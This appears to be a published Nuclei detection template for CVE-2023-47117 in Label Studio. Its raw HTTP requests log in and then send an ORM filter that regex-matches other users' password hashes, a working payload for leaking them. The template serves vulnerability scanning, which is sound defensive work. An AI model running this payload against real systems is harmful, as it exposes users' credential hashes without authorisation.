Label Studio - Sensitive Information Exposure
ID: CVE-2023-47117
Severity: high
Author: iamnoooob,rootxharsh,pdresearch
Tags: cve,cve2023,label_studio,oss,exposure,authenticated
Description
Section titled “Description”An attacker can construct a filter chain to filter tasks based on sensitive fields for all user accounts on the platform by exploiting Django’s Object Relational Mapper (ORM). Since the results of query can be manipulated by the ORM filter, an attacker can leak these sensitive fields character by character.
YAML Source
Section titled “YAML Source”id: CVE-2023-47117
info: name: Label Studio - Sensitive Information Exposure author: iamnoooob,rootxharsh,pdresearch severity: high description: | An attacker can construct a filter chain to filter tasks based on sensitive fields for all user accounts on the platform by exploiting Django's Object Relational Mapper (ORM). Since the results of query can be manipulated by the ORM filter, an attacker can leak these sensitive fields character by character. reference: - https://security.snyk.io/vuln/SNYK-PYTHON-LABELSTUDIO-6056277 - https://nvd.nist.gov/vuln/detail/CVE-2023-47117 - https://github.com/elttam/publications classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-47117 cwe-id: CWE-200 epss-score: 0.0009 epss-percentile: 0.38398 cpe: cpe:2.3:a:humansignal:label_studio:*:*:*:*:*:*:*:* metadata: verified: true max-request: 4 vendor: humansignal product: label_studio shodan-query: http.favicon.hash:-1649949475 tags: cve,cve2023,label_studio,oss,exposure,authenticated
variables: Task_id: "{{task}}" Project_id: "{{project}}"
http: - raw: - | GET /user/login/ HTTP/1.1 Host: {{Hostname}}
- | POST /user/login/?next=/projects/ HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
csrfmiddlewaretoken={{csrf}}&email={{username}}&password={{password}}&persist_session=on
- | PATCH /api/dm/views/{{Task_id}}?interaction=filter&project={{Project_id}} HTTP/1.1 Host: {{Hostname}} Content-Type: application/json
{"id":{{Task_id}},"data":{"title":"Tasks","ordering":[],"type":"list","target":"tasks","filters":{"conjunction":"or","items":[{"filter":"filter:tasks:updated_by__active_organization__active_users__password","operator":"regex","value":"^pbkdf2_sha256\\$260000\\$","type":"String"}]},"hiddenColumns":{"explore":[],"labeling":[]},"columnsWidth":{},"columnsDisplayType":{},"gridWidth":4,"search_text":null},"project":"{{Project_id}}"}
- | GET /api/tasks?page=1&page_size=30&view={{Task_id}}&interaction=filter&project={{Project_id}} HTTP/1.1 Host: {{Hostname}}
matchers: - type: dsl dsl: - 'contains_all(body_4, "completed_at", "file_upload", "annotators")' - 'status_code_3==200 && status_code_4==200' - 'contains(header_4, "application/json")' condition: and
extractors: - type: regex part: body name: csrf group: 1 regex: - 'me="csrfmiddlewaretoken" value="([a-zA-Z0-9]+)">' internal: true# digest: 4a0a0047304502207ede49f75cc3169d09cd97e017a90b1324780dd85c1172ba0b74bec207388754022100cf8b92f1d05f057749e5c0d900ae33bbe48f69437106a099b805bb0711d9d1b0:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-47117.yaml"